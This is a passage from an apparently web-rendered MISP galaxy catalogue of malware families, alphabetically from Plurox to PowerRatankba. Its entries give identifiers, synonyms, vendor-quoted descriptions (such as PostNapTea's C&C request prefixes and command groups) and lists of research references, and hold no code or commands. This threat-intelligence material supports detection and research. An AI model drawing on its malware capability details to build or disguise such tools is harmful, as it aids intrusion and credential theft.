- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/ - webarchive
- https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-blackmatter-lockbit-thor - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2024-1209.pdf - webarchive
- https://blog.xorhex.com/blog/reddeltaplugxchangeup/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage - webarchive
- https://jsac.jpcert.or.jp/archive/2024/pdf/JSAC2024_1_7_hara_nakajima_kawakami_en.pdf - webarchive
- https://www.trendmicro.com/en_my/research/18/h/supply-chain-attack-operation-red-signature-targets-south-korean-organizations.html - webarchive
- https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/ - webarchive
- https://unit42.paloaltonetworks.com/plugx-variants-in-usbs/ - webarchive
- https://www.splunk.com/en_us/blog/security/unmasking-the-enigma-a-historical-dive-into-the-world-of-plugx-malware.html - webarchive
- https://www.youtube.com/watch?v=E2_DTQJjDYc - webarchive
- https://go.contextis.com/rs/140-OCV-459/images/White%20Paper_PlugX%20-%20Payload%20Extraction.pdf - webarchive
- https://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf - webarchive
- https://www.recordedfuture.com/redecho-targeting-indian-power-sector/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-atlas - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments - webarchive
- https://risky.biz/whatiswinnti/ - webarchive
- https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/ - webarchive
- https://www.welivesecurity.com/2022/03/23/mustang-panda-hodur-old-tricks-new-korplug-variant/ - webarchive
- https://twitter.com/xorhex/status/1399906601562165249?s=20 - webarchive
- https://kienmanowar.wordpress.com/2023/01/09/quicknote-another-nice-plugx-sample/ - webarchive
- https://www.cybereason.com/blog/threat-analysis-report-plugx-rat-loader-evolution - webarchive
- https://cyberandramen.net/2022/01/06/a-gulp-of-plugx/ - webarchive
- https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-handle-stack-strings/ - webarchive
- https://www.cyber.gov.au/sites/default/files/2019-03/msp_investigation_report.pdf - webarchive
- https://www.anomali.com/blog/covid-19-themes-are-being-utilized-by-threat-actors-of-varying-sophistication - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Plurox
Internal MISP references
UUID 6c8b94fc-f2d4-4347-aa49-4e6daac74314
which can be used as unique global reference for Plurox
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
pngdowner
Internal MISP references
UUID fb4313ea-1fb6-4766-8b5c-b41fd347e4c5
which can be used as unique global reference for pngdowner
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PNGLoad
According to ESET Research, PNGLoad is a second-stage payload deployed by Worok on compromised systems and loaded either by CLRLoad or PowHeartBeat. PNGLoad has capabilities to download and execute additional payloads from a C&C server, which is likely how the attackers have deployed PNGLoad on systems compromised with PowHeartBeat. PNGLoad is a loader that uses bytes from PNG files to create a payload to execute. It is a 64-bit .NET executable - obfuscated with .NET Reactor - that masquerades as legitimate software.
Internal MISP references
UUID f99b030e-7ad5-4983-b28a-43c14efd27c9
which can be used as unique global reference for PNGLoad
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PocoDown
PocoDown uses the POCO C++ cross-platform library and XOR-based string obfuscation. It shares SSL library code and strings with Xtunnel and infrastructure with X-Agent, and has probably been in use since mid-2018.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PocoDown.
Known Synonyms |
---|
Blitz |
PocoDownloader |
Internal MISP references
UUID 25804d6d-447f-4933-9ba0-876f9d054b68
which can be used as unique global reference for PocoDown
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.pocodown - webarchive
- https://threatvector.cylance.com/en_us/home/flirting-with-ida-and-apt28.html - webarchive
- https://threatvector.cylance.com/en_us/home/inside-the-apt28-dll-backdoor-blitz.html - webarchive
- https://twitter.com/cyb3rops/status/1129653190444703744 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
poisonplug
According to FireEye, POISONPLUG is a highly obfuscated modular backdoor with plug-in capabilities. The malware is capable of registry or service persistence, self-removal, plug-in execution, and network connection forwarding. POISONPLUG has been observed using social platforms to host encoded C&C commands.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular poisonplug.
Known Synonyms |
---|
Barlaiy |
Internal MISP references
UUID 3b1c7856-5158-418c-90ad-afda67a66963
which can be used as unique global reference for poisonplug
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.poisonplug - webarchive
- https://securelist.com/apt-trends-report-q3-2020/99204/ - webarchive
- https://www.fireeye.com/blog/threat-research/2019/10/lowkey-hunting-for-the-missing-volume-serial-id.html - webarchive
- https://content.fireeye.com/apt-41/rpt-apt41/ - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf - webarchive
- https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Poison Ivy
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Poison Ivy.
Known Synonyms |
---|
SPIVY |
pivy |
poisonivy |
Internal MISP references
UUID 7789fc1b-3cbc-4a1c-8ef0-8b06760f93e7
which can be used as unique global reference for Poison Ivy
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.poison_ivy - webarchive
- https://www.fortinet.com/blog/threat-research/pivnoxy-and-chinoxy-puppeteer-analysis - webarchive
- http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf - webarchive
- https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html - webarchive
- https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-GuPan.pdf - webarchive
- https://attack.mitre.org/groups/G0011 - webarchive
- https://unit42.paloaltonetworks.com/atoms/shallowtaurus/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-union - webarchive
- https://engineers.ffri.jp/entry/2022/11/30/141346 - webarchive
- https://www.secureworks.com/research/threat-profiles/aluminum-saratoga - webarchive
- https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf - webarchive
- https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html - webarchive
- https://www.youtube.com/watch?v=1WfPlgtfWnQ - webarchive
- https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf - webarchive
- https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2011/the_nitro_attacks.pdf - webarchive
- https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf - webarchive
- https://community.riskiq.com/article/56fa1b2f - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/ - webarchive
- https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/ - webarchive
- https://vb2020.vblocalhost.com/uploads/VB2020-20.pdf - webarchive
- https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers - webarchive
- https://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-attributed-apt-group-th3bug-using-poison-ivy/ - webarchive
- http://blogs.360.cn/post/APT_C_01_en.html - webarchive
- https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/analysing-a-recent-poison-ivy-sample/ - webarchive
- https://vb2020.vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-firestone - webarchive
- https://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf - webarchive
- https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/ - webarchive
- https://unit42.paloaltonetworks.com/atoms/crawling-taurus/ - webarchive
- https://vblocalhost.com/uploads/VB2020-20.pdf - webarchive
- https://www.recordedfuture.com/china-linked-ta428-threat-group - webarchive
- https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2016/2016.04.26.New_Poison_Ivy_Activity_Targeting_Myanmar_Asian_Countries/New%20Poison%20Ivy%20Activity%20Targeting%20Myanmar%2C%20Asian%20Countries.pdf - webarchive
- https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf - webarchive
- https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html - webarchive
- https://www.youtube.com/watch?v=YCwyc6SctYs - webarchive
- https://lab52.io/blog/icefog-apt-group-abusing-recent-conflict-between-iran-and-eeuu/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-keystone - webarchive
- https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/ - webarchive
- http://blog.fortinet.com/2017/08/23/deep-analysis-of-new-poison-ivy-variant - webarchive
- https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/ - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa20-275a - webarchive
- https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/ - webarchive
- https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-riverside - webarchive
- https://researchcenter.paloaltonetworks.com/2016/04/unit42-new-poison-ivy-rat-variant-targets-hong-kong-pro-democracy-activists/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology - webarchive
- https://blog.fortinet.com/2017/09/15/deep-analysis-of-new-poison-ivy-plugx-variant-part-ii - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Poison RAT
Internal MISP references
UUID 69605d66-d77e-4e7b-8c64-381e2cd97c14
which can be used as unique global reference for Poison RAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Poldat
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Poldat.
Known Synonyms |
---|
KABOB |
Zlib |
Internal MISP references
UUID d30d5a0c-cbfb-49c3-99e7-1d6d1888fc2d
which can be used as unique global reference for Poldat
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PolPo
Internal MISP references
UUID 40a4c426-5a50-4252-89ce-c857788568cc
which can be used as unique global reference for PolPo
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.polpo - webarchive
- https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/ - webarchive
- https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/?utm_source=rss&utm_medium=rss&utm_campaign=apt-group-targeting-governmental-agencies-in-east-asia - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PolyglotDuke
Internal MISP references
UUID 53371de9-291a-4d33-9fd2-058b43dddd5d
which can be used as unique global reference for PolyglotDuke
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.polyglotduke - webarchive
- https://www.welivesecurity.com/2019/10/17/operation-ghost-dukes-never-left/ - webarchive
- https://www.secureworks.com/research/threat-profiles/iron-hemlock - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Polyglot
Internal MISP references
UUID 5ee77368-5e09-4016-ae73-82b99e830832
which can be used as unique global reference for Polyglot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PolyVice
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PolyVice.
Known Synonyms |
---|
Chily |
Internal MISP references
UUID 31017b7c-c023-4247-b37d-f15f2df5d25a
which can be used as unique global reference for PolyVice
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.polyvice - webarchive
- https://www.intrinsec.com/vice-society-spreads-its-own-ransomware/ - webarchive
- https://detect.fyi/rhysida-ransomware-and-the-detection-opportunities-3599e9a02bb2 - webarchive
- https://www.sentinelone.com/labs/custom-branded-ransomware-the-vice-society-group-and-the-threat-of-outsourced-development/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Pony
According to KnowBe4, Pony Stealer is a password stealer that can decrypt or unlock passwords for over 110 different applications including VPN, FTP, email, instant messaging, web browsers and much more. Pony Stealer is very dangerous and once it infects a PC it will turn the device into a botnet, allowing it to use the PCs it infects to infect other PCs.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Pony.
Known Synonyms |
---|
Fareit |
Siplog |
Internal MISP references
UUID cd201689-4bf1-4c5b-ac4d-21c4dcc39e7d
which can be used as unique global reference for Pony
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.pony - webarchive
- https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/ - webarchive
- https://i.blackhat.com/asia-21/Thursday-Handouts/as21-Taniguchi-How-Did-The-Adversaries-Abusing-The-Bitcoin-Blockchain-Evade-Our-Takeover.pdf - webarchive
- https://www.knowbe4.com/pony-stealer - webarchive
- https://www.youtube.com/watch?v=y8Z9KnL8s8s - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf - webarchive
- https://www.youtube.com/watch?v=EyDiIAt__dI - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-evergreen - webarchive
- https://github.com/nyx0/Pony - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-evergreen - webarchive
- https://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/ - webarchive
- https://www.uperesia.com/analysis-of-a-packed-pony-downloader - webarchive
- https://int0xcc.svbtle.com/practical-threat-hunting-and-incidence-response-a-case-of-a-pony-malware-infection - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-galleon - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-galleon - webarchive
- https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry - webarchive
- https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/ - webarchive
- https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf - webarchive
- https://www.youtube.com/watch?v=42yldTQ-fWA - webarchive
- https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf - webarchive
- https://intel471.com/blog/a-brief-history-of-ta505 - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-essex - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-essex - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PoohMilk Loader
Internal MISP references
UUID 54327cbd-d30c-4684-9a66-18ae36b28399
which can be used as unique global reference for PoohMilk Loader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
POORTRY
According to Mandiant, POORTRY is a malware written as a driver, signed with a Microsoft Windows Hardware Compatibility Authenticode signature. This malware has been observed being used by UNC3944.
Internal MISP references
UUID 17b87423-66e5-451e-8a84-5f4fd8bb2b01
which can be used as unique global reference for POORTRY
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.poortry - webarchive
- https://www.quorumcyber.com/threat-actors/scattered-spider-threat-actor-profile/ - webarchive
- https://acsense.com/blog/a-guide-to-scattered-spider-data-breaches/ - webarchive
- http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa - webarchive
- https://www.trellix.com/about/newsroom/stories/research/scattered-spider-the-modus-operandi/ - webarchive
- https://blog.bushidotoken.net/2023/08/tracking-adversaries-scattered-spider.html - webarchive
- https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PoorWeb
Internal MISP references
UUID e166950b-2d0d-41e1-aee6-ccf0895ce9a5
which can be used as unique global reference for PoorWeb
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.poorweb - webarchive
- https://asec.ahnlab.com/ko/18796/ - webarchive
- https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf - webarchive
- https://blog.reversinglabs.com/blog/poorweb-exploiting-document-formats - webarchive
- https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/ - webarchive
- https://securelist.com/apt-trends-report-q2-2018/86487/ - webarchive
- https://fortiguard.com/resources/threat-brief/2019/05/10/fortiguard-threat-intelligence-brief-may-10-2019 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Popcorn Time
Internal MISP references
UUID 4ceebc38-f50b-4817-930f-c954d203ff7b
which can be used as unique global reference for Popcorn Time
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PortDoor
Internal MISP references
UUID 7d3b71ff-6dbc-43bb-ae74-9aacdf80783c
which can be used as unique global reference for PortDoor
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.portdoor - webarchive
- https://medium.com/@Ilandu/portdoor-malware-afc9d0796cba - webarchive
- https://www.socinvestigation.com/chinese-new-backdoor-deployed-for-cyberespionage/ - webarchive
- https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Targeted-attack-on-industrial-enterprises-and-public-institutions-En.pdf - webarchive
- https://www.cybereason.com/blog/research/portdoor-new-chinese-apt-backdoor-attack-targets-russian-defense-sector - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
portless
Internal MISP references
UUID b813cb80-28ff-4713-abdc-e9a22d397bb4
which can be used as unique global reference for portless
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PortStarter
Internal MISP references
UUID 20b3f812-f81b-4df2-9dbc-de83aa73d24f
which can be used as unique global reference for PortStarter
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
poscardstealer
Internal MISP references
UUID 5fa166d1-128b-4057-87e3-6676b7d9a7d7
which can be used as unique global reference for poscardstealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PoshC2
PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming, post-exploitation and lateral movement.
PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools, allowing an extensible and flexible C2 framework. Out of the box, PoshC2 comes with PowerShell/C# and Python3 implants with payloads written in PowerShell v2 and v4, C++ and C# source code, a variety of executables, DLLs and raw shellcode, in addition to a Python3 payload. These enable C2 functionality on a wide range of devices and operating systems, including Windows, *nix and OSX.
Internal MISP references
UUID 0215eae2-0ab7-4567-8ac6-1be36a7893a6
which can be used as unique global reference for PoshC2
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.poshc2 - webarchive
- https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf - webarchive
- https://labs.nettitude.com/blog/detecting-poshc2-indicators-of-compromise/ - webarchive
- https://redcanary.com/blog/getsystem-offsec/ - webarchive
- https://jsac.jpcert.or.jp/archive/2024/pdf/JSAC2024_1_9_takeda_furukawa_en.pdf - webarchive
- https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/poshc2_apt_33.md - webarchive
- https://5851803.fs1.hubspotusercontent-na1.net/hubfs/5851803/Russian%20Ransomware%20C2%20Network%20Discovered%20in%20Censys%20Data.pdf - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf - webarchive
- https://censys.com/russian-ransomware-c2-network-discovered-in-censys-data/ - webarchive
- https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f - webarchive
- https://paper.seebug.org/1301/ - webarchive
- https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/ - webarchive
- https://ti.dbappsecurity.com.cn/blog/articles/2021/09/06/operation-maskface/ - webarchive
- https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html - webarchive
- http://www.rewterz.com/rewterz-news/rewterz-threat-alert-iranian-apt-uses-job-scams-to-lure-targets - webarchive
- https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-trinity - webarchive
- https://github.com/nettitude/PoshC2_Python/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PoSlurp
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PoSlurp.
Known Synonyms |
---|
PUNCHTRACK |
Internal MISP references
UUID 15305d8b-55ff-47b2-b1c7-550a8a36ce36
which can be used as unique global reference for PoSlurp
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.poslurp - webarchive
- https://atr-blog.gigamon.com/2019/07/23/abadbabe-8badf00d-discovering-badhatch-and-a-detailed-look-at-fin8s-tooling/ - webarchive
- https://twitter.com/just_windex/status/1162118585805758464 - webarchive
- https://www.root9b.com/sites/default/files/whitepapers/PoS%20Malware%20ShellTea%20PoSlurp.pdf - webarchive
- https://norfolkinfosec.com/fuel-pumps-ii-poslurp-b/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PostNapTea
PostNapTea aka SIGNBT is an HTTP(S) RAT that is written as a complex object-oriented project.
In 2022-2023, it was deployed against targets such as a newspaper organization, an agriculture-related entity, and a software vendor. Initial access was usually achieved by exploiting vulnerabilities in software widely used in South Korea.
It collects various information about the victim’s computer, such as computer name, product name, OS details, system uptime, CPU information, system locale, time zone, network status, and malware configuration.
PostNapTea uses AES for encryption and decryption of network traffic. A constant prefix, SIGNBT, occurs in its HTTP POST requests. The prefix is concatenated with 2 characters that identify the communication stage:
- LG: logging into the C&C server
- KE: acknowledging the successful login to the C&C
- FI: sending the status of a failed operation
- SR: sending the status of a successful operation
- GC: getting the next command
There are five classes that represent command groups:
- CCButton: for file manipulation and screen capturing
- CCBitmap: for network commands, implementing functionality of Windows commands often abused by attackers, like sc, reg, arp, net, ver, wmic, ping, whoami, netstat, tracert, lookup, ipconfig, systeminfo, and netsh advfirewall
- CCComboBox: for file system management
- CCList: for process management
- CCBrush: for control of the malware itself
It stores its configuration in JSON format. It resolves the Windows APIs it requires during runtime, via the Fowler–Noll–Vo (FNV) hash function.
Its internal name in the version-information resource is usually ppcsnap.dll or pconsnap.dll, which loosely inspired its code name.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PostNapTea.
Known Synonyms |
---|
SIGNBT |
Internal MISP references
UUID a31717c0-f25e-4da4-b1a8-84b6fdca2ea1
which can be used as unique global reference for PostNapTea
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Poulight Stealer
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Poulight Stealer.
Known Synonyms |
---|
Poullight |
Internal MISP references
UUID e4bcb3e4-17f6-4786-a19b-255c48a07f9a
which can be used as unique global reference for Poulight Stealer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.poulight_stealer - webarchive
- https://www.youtube.com/watch?v=MaPXDCq-Gf4 - webarchive
- https://www.carbonblack.com/blog/tau-threat-discovery-cryptocurrency-clipper-malware-evolves/ - webarchive
- https://blog.360totalsecurity.com/en/a-txt-file-can-steal-all-your-secrets/?web_view=true - webarchive
- https://twitter.com/MBThreatIntel/status/1240389621638402049?s=20 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Povlsomware
According to Trend Micro, Povlsomware (Ransom.MSIL.POVLSOM.THBAOBA) is a proof-of-concept (POC) ransomware first released in November 2020 which, according to their Github page, is used to “securely” test the ransomware protection capabilities of security vendor products.
Internal MISP references
UUID 632001f4-a313-4753-b876-f85df00bc387
which can be used as unique global reference for Povlsomware
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Poweliks
Internal MISP references
UUID 782bee33-9f8d-41df-a608-c014bd6a7de1
which can be used as unique global reference for Poweliks
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.poweliks - webarchive
- https://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users - webarchive
- https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/ - webarchive
- https://www.gdatasoftware.com/blog/2014/07/23947-poweliks-the-persistent-malware-without-a-file - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
POWERBAND
.NET variant of ps1.powerton.
Internal MISP references
UUID ab603f29-9c10-4fb0-9fa3-e123fad11a31
which can be used as unique global reference for POWERBAND
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PowerCat
Internal MISP references
UUID f19e4583-e14d-41b7-9b7a-2bd7eeffd4b1
which can be used as unique global reference for PowerCat
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.powercat - webarchive
- https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ - webarchive
- https://www.cyborgsecurity.com/blog/you-dont-know-the-hafnium-of-it/ - webarchive
- https://twitter.com/VK_Intel/status/1141540229951709184 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PowerDuke
Internal MISP references
UUID c79f5876-e3b9-417a-8eaf-8f1b01a0fecd
which can be used as unique global reference for PowerDuke
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.powerduke - webarchive
- https://cocomelonc.github.io/malware/2023/07/26/malware-tricks-35.html - webarchive
- https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/ - webarchive
- https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
powerkatz
Internal MISP references
UUID 9e3aaf82-268b-47d1-b953-3799c5e1f475
which can be used as unique global reference for powerkatz
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PowerLoader
Internal MISP references
UUID de96ba83-27ec-434c-b77f-7a06820b6e78
which can be used as unique global reference for PowerLoader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PowerPool
Internal MISP references
UUID 02e5196e-f7ac-490a-9a92-d4865740016b
which can be used as unique global reference for PowerPool
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PowerShellRunner
Internal MISP references
UUID 1e2dfce6-1e38-4cff-a78e-b43a442ae8e6
which can be used as unique global reference for PowerShellRunner
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Powersniff
Malware of the Gozi family, developed on the ISFB code base. It is delivered through documents distributed by e-mail that use Office macros and PowerShell.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Powersniff.
Known Synonyms |
---|
PUNCHBUGGY |
Internal MISP references
UUID 519d07f5-bea3-4360-8aa5-f9fcdb79cb52
which can be used as unique global reference for Powersniff
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.powersniff - webarchive
- https://atr-blog.gigamon.com/2019/07/23/abadbabe-8badf00d-discovering-badhatch-and-a-detailed-look-at-fin8s-tooling/ - webarchive
- https://lokalhost.pl/gozi_tree.txt - webarchive
- https://content.fireeye.com/m-trends/rpt-m-trends-2017 - webarchive
- https://afyonluoglu.org/PublicWebFiles/Reports-TR/2017%20FireEye%20M-Trends%20Report.pdf - webarchive
- https://unit42.paloaltonetworks.com/powersniff-malware-used-in-macro-based-attacks/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PowerRatankba
QUICKRIDE.POWER is a PowerShell variant of the QUICKRIDE backdoor. Its payloads are often saved to C:\windows\temp\.
Synonyms
